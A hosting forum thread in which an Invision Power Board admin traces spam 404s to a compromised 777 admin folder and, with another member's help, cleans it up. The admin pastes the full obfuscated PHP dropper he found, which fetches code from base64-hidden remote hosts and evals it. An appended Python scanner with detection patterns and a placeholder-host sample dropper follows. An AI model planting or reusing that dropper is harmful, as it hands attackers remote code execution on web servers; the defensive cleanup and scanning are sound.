KeysCapt

join:2001-07-11
Carson City, NV

1 edit

KeysCapt

Forum folder security question

I run a private forum using Invision Power Board v2.2. In the domain error log, I see numerous entries similar to this:
File does not exist: /home/domain/public_html/forums/admin/ggg-devot-torrent.html
File does not exist: /home/domain/public_html/forums/admin/tribalwars-bot-crack.html
 
If I do a search on who links to the site, I see hundreds of links like those above to files that don't exist.
That particular folder has permissions set to 777. If I restrict it, I get constant errors in the log saying that an .htaccess file cannot be checked. Any help with this would be greatly appreciated. It looks like somehow the folder is being used to relay porn and other crap although I don't know how it would be accessed.

Edit: I'm wondering now if when I change the permissions to restrict access, all the .htaccess errors are caused by these spambots or whatever hitting the site unsuccessfully. I do have it restricted now.

Snowy
Lock him up!!!
Premium Member
join:2003-04-05
Kailua, HI

Snowy

Premium Member

said by KeysCapt:

Edit: I'm wondering now if when I change the permissions to restrict access, all the .htaccess errors are caused by these spambots or whatever hitting the site unsuccessfully. I do have it restricted now.
That is correct.

KeysCapt

join:2001-07-11
Carson City, NV

KeysCapt

OK thanks. I'd love to understand how all these sites can use that folder as a relay or whatever when nothing is visible at any time in the folder via FTP.

Snowy
Lock him up!!!
Premium Member
join:2003-04-05
Kailua, HI

Snowy

Premium Member

How are you accessing the site via ftp?
If you are using your browser, files can be hidden from your view.
If you are using an ftp client (e.g., filezilla) be sure to check "show hidden files"

KeysCapt

join:2001-07-11
Carson City, NV

KeysCapt

FireFTP. Show hidden files is, and has been checked.


KeysCapt

KeysCapt

For anyone who is interested, apparently the folder had permissions that facilitated click-through, and a php file was placed in it to allow referrers and file transfers. The contents of the php file look like this:
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="2bdd74c2ad8bb543db32dd89479614c3") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);}; ?>
 
I've deleted that and replaced the .htaccess file which apparently allowed the exploit. The folder permissions have been restricted, and all the hits are now failing.
Thanks to Snowy for all the help digging into this.
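A defender-side sweep for the two conditions this thread turned up, a world-writable folder and a PHP file that fetches remote content and evals it, given here as an added example that is not part of any post in the thread. The trait names, the two-trait threshold, and the constructed sample with the placeholder host host.example.invalid are assumptions of this example.

```python
import base64, contextlib, os, pathlib, re, stat, tempfile
# Traits visible in the dropper quoted above; names and threshold are this example's.
TRAITS = {
    "errors silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "eval of a variable": re.compile(r"\beval\s*\(\s*\$"),
    "include of decoded URL": re.compile(r"\binclude\s*\(\s*base64_decode"),
    "fetch of decoded URL": re.compile(r"\b(?:file_get_contents|curl_init)\s*\(\s*base64_decode"),
}
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")

def decode_literals(source):
    """Return the plain text hidden in base64_decode("...") string literals."""
    decoded = []
    for blob in B64_LITERAL.findall(source):
        with contextlib.suppress(ValueError):  # skip strings that are not valid base64
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
    return decoded

def scan(webroot):
    """Report world-writable directories and PHP files showing two or more traits."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):  # os.walk lists dotfiles too
        rel = os.path.relpath(dirpath, webroot)
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.append(("world-writable dir", rel, []))
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".inc")):
                source = pathlib.Path(dirpath, name).read_text(errors="replace")
                hits = [label for label, rx in TRAITS.items() if rx.search(source)]
                if len(hits) >= 2:
                    findings.append(("suspect php", os.path.join(rel, name),
                                     hits + decode_literals(source)))
    return findings

def demo():
    """Constructed tree: a 777 'admin' folder holding a look-alike dropper (placeholder host)."""
    enc = lambda text: base64.b64encode(text.encode()).decode()
    dropper = ('<? error_reporting(0);$f=base64_decode("%s");'
               '$c=file_get_contents(base64_decode("%s").$f);eval($c); ?>'
               % (enc("host.example.invalid"), enc("http://")))
    with tempfile.TemporaryDirectory() as root:
        admin = os.path.join(root, "admin")
        os.mkdir(admin)
        os.chmod(admin, 0o777)
        for name, body in (("x.php", dropper), ("index.php", '<?php echo "ok"; ?>')):
            pathlib.Path(admin, name).write_text(body)
        return scan(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Call `scan()` on the real document root to run the same sweep; the decoded literals in each finding show what the base64 strings in a flagged file hide.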
19579823 (banned)
An Awesome Dude
join:2003-08-04

1 edit

19579823 (banned) to KeysCapt

Member

quote:
I do have it restricted now.
Excellent -- the idiots will be kept at bay